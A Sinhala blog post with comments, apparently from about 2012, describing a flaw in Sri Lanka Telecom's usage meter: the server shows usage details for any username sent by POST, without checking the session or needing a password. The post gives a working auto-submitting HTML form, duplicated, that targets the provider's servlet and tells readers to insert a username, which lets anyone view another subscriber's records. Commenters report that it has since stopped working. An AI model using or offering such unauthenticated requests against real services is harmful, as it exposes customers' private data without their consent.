මේදවස් වල හැම තැනම softwere කෑල්ලක් යනව SLT Usage Meter එක හැක් කලා කියලා.
ඇත්තටම එහෙම කරළද?
එක මේ Meter එක හදද්දි ඉතුරුවෙච්ච පුංචි හිලක්.
අපි පොඩි POST requests යැව්වහම මේ ගොයියා විස්තර ඔක්කොම පෙන්වනවා SESSION එක check කරන්නේ නෑ
ඒ කියන්නේ password ඕනෙ නෑ...
ඉක්මනට මේ හිල වහයි කියලා බලාපොරොත්තු වෙනවා.
හැබැයි ඉතින් වෙන කාහෙවත් Usage බලල මොනව කරන්නද?
"N" කියල තියෙන්නේ අද දිනේට හරියන විදිහට පෙන්නන්න කියලා system එකට කියන්න.
වෙනස් කරනවනම් month format එක මේං : OCT/2012
වෙනස් කරනවනම් month format එක මේං : OCT/2012
හැම තිස්සෙම මේපැත්තේ එන එක කරදරයි වගේ නම්, මේ පහලතියෙන code එක copy කරගන්න. ඊට පස්සේ notepad වගේ text editor එකක් open කරලා code එක paste කරලා, රතු පාටින් තියෙන "xx0000000" වෙනුවට ඔයාගේ User Name එක දාලා html document එකක් විදිහට save කරගන්න. ඒ කියන්නේ web browser එකකින් open කරන්න පුළුවන් file එකක් විදිහට. file එකේ extension එක .html උනානම් හරි.
<html>
<head>
<title>SLT Usage Meter</title>
</head>
<body>
<form name="myForm" id="myForm" action="http://webusage.slt.lk:8080/servlet/BmsWeb" method="POST">
<select name="service">
<option value="SLTBB">BROADBAND</option>
<option value="ROAM">ROAM</option>
<option value="WIFI">WIFI</option>
<option value="ISDN">ISDN</option>
<option value="PSTN">PSTN</option>
<option value="CDMA">CDMA</option>
</select>
<input name="userName" type="text" value="xx0000000">
<input name="mon1" type="text" value="N">
<input name="mon2" type="text" value="N">
<input name="mon3" type="text" value="N">
<input name="mon4" type="text" value="N">
<input name="I1" type="submit" value="submit">
</form>
<script type="text/javascript">
document.forms["myForm"].submit();
</script>
</body>
</html>
<head>
<title>SLT Usage Meter</title>
</head>
<body>
<form name="myForm" id="myForm" action="http://webusage.slt.lk:8080/servlet/BmsWeb" method="POST">
<select name="service">
<option value="SLTBB">BROADBAND</option>
<option value="ROAM">ROAM</option>
<option value="WIFI">WIFI</option>
<option value="ISDN">ISDN</option>
<option value="PSTN">PSTN</option>
<option value="CDMA">CDMA</option>
</select>
<input name="userName" type="text" value="xx0000000">
<input name="mon1" type="text" value="N">
<input name="mon2" type="text" value="N">
<input name="mon3" type="text" value="N">
<input name="mon4" type="text" value="N">
<input name="I1" type="submit" value="submit">
</form>
<script type="text/javascript">
document.forms["myForm"].submit();
</script>
</body>
</html>
14 comments:
ලංකාවේ හැකර්ලා.....
:D :D :D
කාහෙවත් Usage බලල මොනව කරන්නද?
password balannath puluwannam shook
Ela Ela Kolla
By EnRiQe
:P
Huko anunge pahanin eliya balanna thoge weapons fire wenne nadda? gon hukanna tho danna hack ekak na, danagahala wadapiya thoge 2.50 blog ekata traffic adaganna chance ekak dunnata.
Meka dan wada karanne na. man dhethunsarayak use kara. dan wada karanne na. ai dhanne na. ? meka mage usage balanna thama use karanne. Slt eke yana eka hama thissama awl wenawa. mata meka podak check karala kiyanawadha?
දැන් ඉතින් පේනවා නේද පොර ටෝක් දැම්මට script kiddies ල කවුද කියල ? ... පොල් ටෝක් දන්නේ නැතුව ඕකත් හදපන් කොල්ලෝ ...
Working SLT Usage meters : (No-pass)
http://www.elakiri.com/forum/showthread.php?t=1593942
and
FF / Chrome add-on
http://www.elakiri.com/forum/showthread.php?t=1557258
den meka weda karann nedda ???
mehema Enawa "Oops! Google Chrome could not connect to webusage.slt.lk:8080"
Did you try this app, really nice app....
https://play.google.com/store/apps/details?id=com.olc.sltmeter
cnt open
ලෝකයේ දුටු නුදුටු දේ දකින්න, ලෝකයේ සිමා මායිම් හබා යන්න, අලුත් විදියට ලෝකය දකින්න වෙර දරණ, ඔබ වෙනුවෙන්ම නිර්මාණය වූ ලංකාවේ හොදම තාක්ෂණික ෆෝරමය, ℯkathuwa.org. එන්න අප හා එක්වන්න දැනුමෙන් සන්නද්ද වන්න. ඔබ තවත් මේ ලෝකයේ මං මුලාවුවෙකු නොවේ!
පරිගණක ආරක්ෂාව සහ හැකින් පිළිබඳ අපේම ෆෝරමය.
http://www.yakadaya.com/
Post a Comment
අදහස් නම් අපිට හුගාක් වටිනවා.........